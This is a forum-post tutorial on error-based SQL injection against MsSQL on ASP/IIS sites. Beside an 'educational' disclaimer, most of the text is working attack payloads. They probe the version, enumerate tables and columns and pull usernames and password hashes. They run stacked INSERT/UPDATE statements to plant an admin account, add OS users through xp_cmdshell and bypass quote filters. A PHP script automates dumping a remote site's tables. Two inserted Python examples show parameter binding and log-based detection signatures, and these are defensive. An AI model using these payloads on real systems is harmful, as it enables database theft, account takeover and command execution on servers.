  #1 Old 08-31-2013, 04:30 PM
Cartographer
Join Date: Aug 2013
Posts: 511

Tutorial Injection MsSQL - Complete

DISCLAIMER: THIS TUTORIAL IS SOLELY FOR EDUCATIONAL PURPOSES, FOR PROTECTING YOUR OWN CODE FROM SQL INJECTIONS. YOU WILL HAVE TO TAKE FULL RESPONSIBILITY FOR ANY ACTION YOU DO AFTER READING THIS TUTORIAL.

Background

This article, entitled "Complete MsSQL Injection For Newbies", intends to provide complete knowledge and know-how of SQL injection specifically targeted at MsSQL (ASP+IIS, because that combination occurs most frequently), except for the stacked query parts. This is my first contribution here...

0x00 The error output

Only error-based output will be covered; building queries and the like will not be described.
To begin, I want to check whether the bug we found is really an injection: an error by itself does not necessarily mean there is one. To check, try to retrieve the version of MsSQL.

Target:
Code:
http://site.com/script.asp?id=5'
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '5'.
/file.asp, line 1000
Errors may differ depending on which language talks to MsSQL (php, asp, cfm).

Obtain Version:
Code:
5' or 1=@@version--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3080.00 (Intel X86) Sep 6 2009 01:43:32 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' to a column of data type int.
/file.asp, line 1000
The database name of the current user:
Code:
id=5' or 1=(select db_name())--
The user name of the owner of this database:
Code:
id=5' or 1=(select system_user)--

0x01 Search the tables and columns.

Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'table_name' to a column of data type int.
/file.asp, line 1000
Here table_name is the name of the first table. How do you get the name of the 5th table? MSSQL has no LIMIT clause, but there are other ways to get the output.

The first method: exclusion, listing the table names already retrieved.
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table_name1','table_name2','table_name3','table_name4'))--
The second method: exclusion by subquery, without specifying the table names.
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+4+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--
The third method: using the comparison operator ">" with the last table name retrieved. With this method you can reach even the 53423rd entry in the table, which methods 1 and 2 cannot, because with NOT IN MsSQL has to walk through all the excluded records, which we want to avoid (with more than 500 entries the database begins to slow down noticeably).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>'table_name4')--
Columns are obtained the same way, only from the COLUMNS table.

0x02 Data output

Suppose the Users table has the columns id (int), username (varchar), password (binary).
To display different data types, we will have to use type conversion (cast, convert, etc.).

We extract the first entry of the id column:
Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users)--
In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1' to data type int.
/inc/file.asp, line 104
Sometimes the conversion function does not solve the problem; then the data can be displayed through the construct that converts the selected data to XML, "FOR XML PATH" (available since MSSQL Server 2005). We shall return to this construct later.

Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users+FOR+XML+PATH(''))--
There seemed to be a way to output it without any tags, but I forgot what it was )=

Now let's take a cell from the password column. "cast(password as binary)" seemed to work well, but there are times when FOR XML PATH, cast or convert does not give the desired result. Then you can look for other functions that are not yet described anywhere. Here is one of them ("..", i.e. the default schema 'dbo', is the shorthand for accessing the system table).
Code:
5'+or+1=(select+top+1+master..fn_varbintohexstr(password)+from+Users)--
Now let's take three cells from 3 different columns at once. MsSQL has no function like MySQL's concat(), but here it is possible to join the output into a single cell using "%2B':'%2B". If my suspicions are correct, %2B (+) is interpreted as the MsSQL + (plus) operator rather than as a space, which is what makes the concatenation work.
Code:
5'+or+1=(SELECT+TOP+1+cast(id+as+nvarchar)%2B':'%2Bconvert(nvarchar,username)%2B':'%2Bmaster..fn_varbintohexstr(password)+FROM+Users)--
If all the types display without errors, it can be written simply as ... TOP+1+id%2B':'%2Busername%2B':'%2Bpassword ... ;

In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1:admin:e075739... ' to data type int.
/inc/file.asp, line 101
It can be a little easier: quotename converts all output cells to nvarchar (be careful, quotename returns null if the output data is more than 258 bytes, i.e. 128 unicode characters).

Code:
5'+or+1=(SELECT+TOP+1+quotename(id%2B':'%2Busername)+FROM+Users)--
If there is a filter or magic_quotes on quotes, change it like this:

Code:
5'+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=char(85)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115))--
0x03 Insert & Update

Another plus of MsSQL + IIS is that very often we can terminate the query with ";" and then start a new one.

Everything is done in much the same way.

Code:
5';+INSERT+INTO+Users+(id,username,pass)+VALUES+(1,'admin','mypass')--
Code:
5';+UPDATE+Users+set+password='mypass'+where+username='admin'--
The commands are executed.

If you have enough rights, usually as the user "sa" (the equivalent of root in mysql), you can try some of the following commands:


How to use them? Very simple: terminate the query with ";" and then add your own:
Code:
5';exec master..xp_cmdshell 'dir c:\'--
Code:
5';exec master..xp_cmdshell 'net user admin password /add'--
Bypassing the quotes:
Code:
5';exec master..xp_cmdshell [net user admin password /add]--
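Since the disclaimer frames this tutorial as protecting your own code, here is an added example (not from the post) of the concatenation bug behind script.asp?id=5' next to its parameter-bound and validated form. It uses an in-memory SQLite table as a stand-in for the MsSQL Users table, and the payloads are constructed in the shape of the ones above (quote break, "or 1=...", ";UPDATE").

```python
import sqlite3

# Added demo, not the post's code: SQLite stands in for MsSQL so it runs offline.
# Users(id, username, password) mirrors the table assumed in 0x02; rows are constructed.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, username TEXT, password BLOB)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                     [(1, "admin", b"\xe0\x75\x73"), (5, "bob", b"\x01\x02")])
    return conn

def lookup_unsafe(conn, raw_id):
    """The bug: the query is built by string concatenation, so a quote in id reshapes it."""
    sql = "SELECT id, username FROM Users WHERE id='%s'" % raw_id
    return conn.execute(sql).fetchall()

def lookup_bound(conn, raw_id):
    """Parameter binding: the value travels as data and is never parsed as SQL."""
    return conn.execute("SELECT id, username FROM Users WHERE id=?", (raw_id,)).fetchall()

def lookup_hardened(conn, raw_id):
    """Binding plus type validation: an id that is not a plain integer is rejected up front."""
    if not str(raw_id).isdigit():
        raise ValueError("id must be a non-negative integer")
    return lookup_bound(conn, int(raw_id))

def demo():
    """Run the same constructed payloads through each variant and collect what happens."""
    conn = make_db()
    tail = "5' or 1=1--"                             # shape of the post's 5'+or+1=(...)--
    stacked = "5'; UPDATE Users SET password='x'--"  # shape of the 0x03 stacked query
    out = {
        "unsafe_rows": len(lookup_unsafe(conn, tail)),  # 2: the OR clause selects every row
        "bound_rows": len(lookup_bound(conn, tail)),    # 0: the payload is compared as text
        "bound_legit": lookup_bound(conn, "5"),         # [(5, 'bob')]: normal input still works
    }
    try:  # the sqlite3 driver refuses a second statement; ADO + MsSQL would run it
        lookup_unsafe(conn, stacked)
        out["stacked_ran"] = True
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        out["stacked_ran"] = False
    try:
        lookup_hardened(conn, "5'")
    except ValueError:
        out["hardened_rejects_quote"] = True
    return out
```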
0x04 Dump

In theory, dumping the entire database in one go via injection without knowledge of the database structure is impossible. But you can get the information in the following ways. First, parsing one record per request (I will post a parser later). Second, parsing through FOR XML RAW (about 2000 characters per request); the script is below. Taken from pastebin.com

Code:
<?php
$host = "www.test.net";
$port = 80;
for($i=$j=0;;$i+=1990,$j++) {
    $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
    $p.= "Host: $host\r\n";
    $p.= "Connection: close\r\n\r\n";
    $ock = fsockopen(gethostbyname($host), $port);
    if(!$ock) {
        return false;
    }
    fputs($ock, $p);
    $html='';
    while(!feof($ock)) {
        $html.= fgets($ock);
    }
    $html = explode("\r\n\r\n",$html);
    if(stripos($html[1],'type mismatch')!==false) {
        break;
    }
    $out = array();
    preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
    if(isset($out[1])) {
        $xml .= htmlspecialchars_decode($out[1]);
    } else {
        break;
    }
}
$r = xml_parser_create();
$out = array();
xml_parse_into_struct($r, '<root>'.$xml, $out);
foreach($out as $el) {
    echo $el['attributes']['E']."\r\n";
}
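The request shapes this tutorial walks through (the 5' quote break, @@version, INFORMATION_SCHEMA enumeration, char() encoding, %2B concatenation, FOR XML RAW, ;exec xp_cmdshell) are exactly what a defender should look for in IIS logs. Below is an added detection example, not part of the original post: it decodes cs-uri-query the way the server does and matches each parameter value against one signature per technique; the log lines, client IPs and paths are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (c-ip cs-uri-stem cs-uri-query sc-status); not from the post.
SAMPLE_LOG = """\
203.0.113.7 /script.asp id=5 200
203.0.113.7 /script.asp id=5' 500
203.0.113.7 /script.asp id=5'+or+1=@@version-- 500
203.0.113.7 /script.asp id=5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- 500
203.0.113.7 /script.asp id=5';exec+master..xp_cmdshell+[dir+c:\\]-- 500
203.0.113.7 /script.asp id=5'+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=char(85)%2Bchar(115))-- 500
203.0.113.7 /index.asp id=1'+and+1=(SELECT+convert(int,SUBSTRING((SELECT+TABLE_NAME+FROM+information_schema.TABLES+FOR+XML+RAW('a')),0,1990)))-- 500
198.51.100.2 /search.asp q=o'reilly 200
"""

# One signature per technique shown in the post, matched against the decoded parameter value.
SIGNATURES = [
    ("unbalanced quote in numeric param", re.compile(r"^\d+'")),
    ("version probe", re.compile(r"@@version", re.I)),
    ("error-based oracle", re.compile(r"\b(or|and)\s+1\s*=\s*\(?\s*(select|@@)", re.I)),
    ("schema enumeration", re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I)),
    ("for xml extraction", re.compile(r"\bfor\s+xml\s+(path|raw)\b", re.I)),
    ("char() obfuscation", re.compile(r"char\(\d+\)\s*\+\s*char\(\d+\)", re.I)),
    ("stacked query", re.compile(r";\s*(exec|execute|insert|update|delete|drop)\b", re.I)),
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
]

def classify_query(raw_query):
    """Return the set of signature names firing on any parameter of a raw cs-uri-query."""
    hits = set()
    for param in raw_query.split("&"):
        _, _, raw_value = param.partition("=")
        # unquote_plus mirrors the server: '+' becomes a space, '%2B' becomes a literal '+'
        value = unquote_plus(raw_value)
        hits.update(name for name, pattern in SIGNATURES if pattern.search(value))
    return hits

def scan_log(text):
    """Return (findings per flagged line, Counter of flagged requests per client IP)."""
    findings, per_client = [], Counter()
    for line in text.splitlines():
        client, stem, query, status = line.split()
        hits = classify_query(query)
        if hits:
            findings.append((client, stem, status, sorted(hits)))
            per_client[client] += 1
    return findings, per_client
```

A plain apostrophe in a free-text parameter (q=o'reilly) is not flagged, while a single 500 on id=5' already is; several flagged requests from one client within a short window is the pattern to alert on.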